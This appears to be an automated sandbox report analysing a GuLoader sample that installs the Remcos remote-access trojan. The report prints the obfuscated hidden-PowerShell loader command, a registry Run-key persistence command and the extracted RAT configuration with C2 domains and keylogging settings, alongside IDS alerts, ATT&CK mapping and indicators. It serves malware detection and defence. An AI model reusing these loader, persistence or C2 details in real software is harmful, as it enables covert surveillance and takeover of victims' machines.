Windows
Analysis Report
zR4aIjCuRs.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64native
- zR4aIjCuRs.exe (PID: 7948 cmdline: "C:\Users\user\Desktop\zR4aIjCuRs.exe" MD5: 02F086FB54D58BF17B51564B34166F5E)
- powershell.exe (PID: 7872 cmdline: "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- msiexec.exe (PID: 8020 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- msiexec.exe (PID: 6448 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- msiexec.exe (PID: 1264 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cmd.exe (PID: 7368 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- reg.exe (PID: 6020 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- WerFault.exe (PID: 4512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324 MD5: 40A149513D721F096DDF50C04DA2F01F)
- WerFault.exe (PID: 2516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 1068 MD5: 40A149513D721F096DDF50C04DA2F01F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
```json
{
  "Host:Port:Password": "q92harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1",
  "Assigned name": "MANIFESTWEALTHS",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Enable",
  "Hide file": "Disable",
  "Mutex": "Rmc-MK0QHY",
  "Keylog flag": "1",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Enable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
```
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
System Summary |
---|
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Stealing of Sensitive Information |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-06T11:47:10.534594+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49769 | 192.169.69.26 | 3980 | TCP |
2024-10-06T11:47:33.265040+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49773 | 192.169.69.26 | 3980 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-06T11:47:04.196262+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49768 | 85.120.16.93 | 443 | TCP |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | File source: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Code function: | 0_2_004065FD | |
Source: | Code function: | 0_2_00402868 | |
Source: | Code function: | 0_2_004059CC |
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: |
Source: | URLs: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | Windows user hook set: | Jump to behavior |
Source: | Code function: | 0_2_00405461 |
E-Banking Fraud |
---|
Source: | File source: |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Code function: | 0_2_0040338F |
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_00406B15 | |
Source: | Code function: | 0_2_004072EC | |
Source: | Code function: | 0_2_00404C9E | |
Source: | Code function: | 2_2_0305EAF0 | |
Source: | Code function: | 2_2_0305EAE0 | |
Source: | Code function: | 2_2_030599A8 |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Classification label: |
Source: | Code function: | 0_2_0040338F |
Source: | Code function: | 0_2_00404722 |
Source: | Code function: | 0_2_00402104 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 2_2_030585CC | |
Source: | Code function: | 2_2_03051E4A | |
Source: | Code function: | 2_2_03051D9A | |
Source: | Code function: | 2_2_08FC454E |
Source: | File created: | Jump to dropped file |
Source: | Registry value created or modified: | Jump to behavior |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior |
Source: | Last function: |
Source: | Thread sleep count: | Jump to behavior |
Source: | File Volume queried: | Jump to behavior |
Source: | Code function: | 0_2_004065FD | |
Source: | Code function: | 0_2_00402868 | |
Source: | Code function: | 0_2_004059CC |
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3500 | ||
Source: | API call chain: | graph_0-3504 |
Source: | System information queried: | Jump to behavior |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_03057711 |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_0040338F |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Remote Access Functionality |
---|
Source: | Mutex created: | Jump to behavior |
Source: | File source: | ||
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Obfuscated Files or Information | 11 Input Capture | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 2 PowerShell | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Software Packing | LSASS Memory | 16 System Information Discovery | Remote Desktop Protocol | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 112 Process Injection | 1 DLL Side-Loading | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 11 Masquerading | NTDS | 13 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Modify Registry | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 13 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 213 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
79% | ReversingLabs | Win32.Trojan.GuLoader | ||
69% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
6% | Virustotal | Browse | ||
1% | Virustotal | Browse | ||
9% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
10% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
9% | Virustotal | Browse | ||
2% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
2% | Virustotal | Browse | ||
1% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
janbours92harbu04.duckdns.org | 45.74.58.7 | true | true | | unknown |
simonastolerciuc.ro | 85.120.16.93 | true | false | | unknown |
janbours92harbu03.duckdns.org | 192.169.69.26 | true | true | | unknown |
janbours92harbu007.duckdns.org | unknown | unknown | true | | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | unknown |
| true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
85.120.16.93 | simonastolerciuc.ro | Romania | | 8708 | RCS-RDS73-75DrStaicoviciRO | false |
192.169.69.26 | janbours92harbu03.duckdns.org | United States | | 23033 | WOWUS | true |
45.74.58.7 | janbours92harbu04.duckdns.org | United States | | 3223 | VOXILITYGB | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1526565 |
Start date and time: | 2024-10-06 11:44:20 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 15m 52s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301) |
Run name: | Suspected Instruction Hammering |
Number of new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | zR4aIjCuRs.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@17/23@4/3 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21
- Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
- Not all processes were analyzed; the report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
05:47:43 | API Interceptor | |
11:47:05 | Autostart | |
11:47:13 | Autostart |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
85.120.16.93 | Get hash | | malicious | Remcos, GuLoader | Browse | |
192.169.69.26 | Get hash | | malicious | VjW0rm, AsyncRAT, RATDispenser | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
janbours92harbu04.duckdns.org | Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
simonastolerciuc.ro | Get hash | | malicious | Remcos, GuLoader | Browse | |
janbours92harbu03.duckdns.org | Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
VOXILITYGB | Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Remcos | Browse | |
| Get hash | | malicious | Remcos | Browse | |
| Get hash | | malicious | Remcos | Browse | |
| Get hash | | malicious | Remcos | Browse | |
| Get hash | | malicious | Remcos | Browse | |
| Get hash | | malicious | Remcos | Browse | |
| Get hash | | malicious | Xmrig | Browse | |
| Get hash | | malicious | Xmrig | Browse | |
| Get hash | | malicious | Nanocore, Remcos | Browse | |
WOWUS | Get hash | | malicious | Remcos | Browse | |
| Get hash | | malicious | Remcos | Browse | |
| Get hash | | malicious | Remcos, PureLog Stealer | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | HTMLPhisher | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
RCS-RDS73-75DrStaicoviciRO | Get hash | | malicious | Mirai | Browse | |
| Get hash | | malicious | Mirai, Moobot | Browse | |
| Get hash | | malicious | Remcos, GuLoader | Browse | |
| Get hash | | malicious | Mirai | Browse | |
| Get hash | | malicious | Mirai, Moobot | Browse | |
| Get hash | | malicious | Sality | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Mirai | Browse | |
| Get hash | | malicious | Unknown | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | | malicious | Babuk, Djvu | Browse | |
| Get hash | | malicious | Stealc | Browse | |
| Get hash | | malicious | FormBook, GuLoader | Browse | |
| Get hash | | malicious | Matanbuchus | Browse | |
| Get hash | | malicious | FormBook, GuLoader | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | Unknown | Browse | |
| Get hash | | malicious | CredGrabber, Meduza Stealer | Browse | |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_6cf0e4ec34412705f7c7679452dd618a68a4ad_6bd5dc59_60d14e17-1202-42d6-adc8-8c198509b060\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.1871363138655737 |
Encrypted: | false |
SSDEEP: | 192:4AXnW8IMZmPxV2jeTADZGih2nDu76gfAIO84:nm8IMoPxV2je0feDu76gfAIO84 |
MD5: | 9FE7CC2C0A71EC51CCE19AFA6D616E65 |
SHA1: | 9C12B87EB514FD5D2C46AE02B9B669CE80BB4D03 |
SHA-256: | 3ABE4A775DA7B65F8DE48CE9085991FE45E1A603AF580E7F1512D97B109E849E |
SHA-512: | 77EB510A7A8DAAF95F1C1F260B2639981B97E2570D7FC89C8AB171D0CABD1287FDE88A1B4418BFC73B5166AED408F13B7C77EB746321B866831D12E2070FC504 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_7999b5829bb6649a4591b7178c861d362cefd5f_6bd5dc59_c269668f-8d0f-4b43-9053-87429be6c60a\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.1867453190313875 |
Encrypted: | false |
SSDEEP: | 192:LGXnW8IM9maQHY7hjeTADZGih2nDu76rfAIO84:im8IMsaQHY7hje0feDu76rfAIO84 |
MD5: | B3FAB23E32E89DA13A581C68F5A5FCD6 |
SHA1: | 6D15A5A17F7EA6C10559E97A33F25D2840360A94 |
SHA-256: | B431C3F4B9830723E202449FA5F0A2DD90819F21521D64E708E664210CD7F514 |
SHA-512: | CC8DAA323817BE8F168F0A28D5A1F4F5F7B3BDEB643FFB37F9A2B20C822CED8E42B4CA535E6AEBEFF84C8119EF486F4631F47BA7E150E82DE4A89A16AA9DA29A |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 161124 |
Entropy (8bit): | 1.8387921709806796 |
Encrypted: | false |
SSDEEP: | 768:1zxue5EnbBcq6n0QOjD+NOk+/JRdMFGtzHyp92E:aBcH4k0JRdMFGtzHyp92E |
MD5: | F9583B5859245B290C5282029473254C |
SHA1: | FBC052D0AA31511EF54B581EBB64794D057D9D2E |
SHA-256: | 788256DC81A0D1114EEBEF1F278A5FD0849BBD28BA79D7925E385F50338CD8D4 |
SHA-512: | 6C1BE077D16FF98931D10BEB3AE7431F8ACA2A4A2B1346C9F938E554B759FE00CE1A618CD5686BAE60518C695424FC80642060821AE7F5D628527C0A0B00EFD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8328 |
Entropy (8bit): | 3.694297801663072 |
Encrypted: | false |
SSDEEP: | 192:R9l7lZNiUg62x6YqA6whugmfd84rpDa89bhHp8ssfnLm:R9lnNib646YF6whugmfdRNhHp8/fi |
MD5: | 54F2B9C9EE9908EF57183B5C56EF690F |
SHA1: | 8E14C194D4CC74D10E71237F7DE3C0F55269CB01 |
SHA-256: | B1C96D036CAF8EB980E082D67D05D97A86ED298B514605FDBC37C462227CCCB8 |
SHA-512: | 6B10A0699B795D972F4818B9D645B54886EF846B3EA0132D9AB0018098DE78562FC4C21A96BFAD3DD05877B9CB7F55D16A7F37D119672754CE548EFEF7CE9270 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4790 |
Entropy (8bit): | 4.475263691878414 |
Encrypted: | false |
SSDEEP: | 48:cvIwwtl8zsHe702I7VFJ5WS2CfjkKs3rm8M4J5sgFMA+q8AFiEFBd:uILf+7GySPfUJYAOEFBd |
MD5: | 5B686901E1EDD7C024F9ED8C6C4E9247 |
SHA1: | 70C5AFB1CCE6B076728B26C6267F32CB1232EC26 |
SHA-256: | AE56E3C282CE1577AC4BF663C5114DDA694168B2A19E8F43DFF1724FB3E02CDC |
SHA-512: | E95320B743C0DAE2AFCC608F539AE7EB6D7A99BB41855AFA37190BAD420095866113548D2663F8034793D75C9808BFF1FFFB530A634E0444AB6B5F4E0AD6127F |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 171596 |
Entropy (8bit): | 1.8427787355926217 |
Encrypted: | false |
SSDEEP: | 384:X1PykXlkAx5HEncDtxNZ8EWW19q6EcdHLV6KwhURMfVukSI39cwCH5Mou:lBm25EncDtRWW19q6EmpcWafVpNcco |
MD5: | 6E958D1F7B3EC13C0A17871D42615CAE |
SHA1: | B2C927F33CBE13F7400C70C7E76283AB40389FAE |
SHA-256: | DAB463DFC5B0E5C0D9D81A41A58394771C118BAEA3C1C40FF610B9BBE0AC664F |
SHA-512: | F7B58FCD2D00131F14AB147C1A11192FCBE89810620D38FFF57CD015B3AE0784BCD544DB221EA03D7DD8097C788FBE44FE43F464562629201353F9C839CFF372 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8328 |
Entropy (8bit): | 3.691612959534491 |
Encrypted: | false |
SSDEEP: | 192:R9l7lZNiUsA6K6YqE6WIgmfxUND4rpr+89bZHp8ssfQzm:R9lnNiI6K6YB6WIgmfxUNERZHp8/f5 |
MD5: | C97F29F1ACA94D773B5DAA02D35D2495 |
SHA1: | ACC241BA2330C459F5099963887A6900907F9FA4 |
SHA-256: | 8CE63F6A2BBA85A09E458B4E14FC473F5ADB1BAA47DFF9F8467E7BBD70AA9E54 |
SHA-512: | 2C8371E4DC28F05A1DA8944A07CE2700018DEDBA64C3B9E46B48E1A7EE62A7DE4E1A9372C95CC724C5E51F97656DDB563876E0BDD156795A8D3977B0D258C5E4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4790 |
Entropy (8bit): | 4.4760910562810805 |
Encrypted: | false |
SSDEEP: | 48:cvIwwtl8zsae702I7VFJ5WS2CfjkSPms3rm8M4J5ssFfo+q8AZiEFBd:uILf/7GySPfJP5JXoqEFBd |
MD5: | 4C2F6824FFE5FF9154BFB840F4FFEAFF |
SHA1: | C60042F6849B8D2D921D1B859745B99559CAC0E0 |
SHA-256: | 8EE4F9C8FDE8796C4B16AFACFBB672C89B795B79A5416FC14B0195F6733FB402 |
SHA-512: | 9920DF95BCD891D372827DB6B1CB0BEDCC0B278FE50C1A17D9AB85F007AF0DE67A686C948D40611DB7F03D94A573CAE1A42F646E02F6220D6241A7E1A38AF3B5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 242 |
Entropy (8bit): | 3.3605062470053775 |
Encrypted: | false |
SSDEEP: | 6:6lJ8DS0Cb5YcIeeDAlMlJ8DS0NwR1SlJ8DS8FIbWAv:6lJ8yDecmlJ8ZlJ8PIbW+ |
MD5: | D720B019BE1F03C97E325758BE4EAF08 |
SHA1: | 48083EE3F2769F3C87EB2CDC4D6EEA58410EB50A |
SHA-256: | FC04BF73CBA8E072D6DB3C49C194A73B4D27334A28E375944B144B6D5CD31F30 |
SHA-512: | B9408A84D190F9031E58CF29D1AA628F0D2EBF6A16A61FBA6D8587B882752DADC7DC775F49ACE4FF5004DBE18B31E35151A525AF0CE4A4EA9D4B07220BCA1A98 |
Malicious: | true |
Yara Hits: | |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 14744 |
Entropy (8bit): | 4.990428309401091 |
Encrypted: | false |
SSDEEP: | 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA |
MD5: | A3F4A4CED5E4717EA59EEDAAA642F0CF |
SHA1: | EB40B4929869C8C2A8866A0F06AE166F406FE493 |
SHA-256: | 59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E |
SHA-512: | 804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
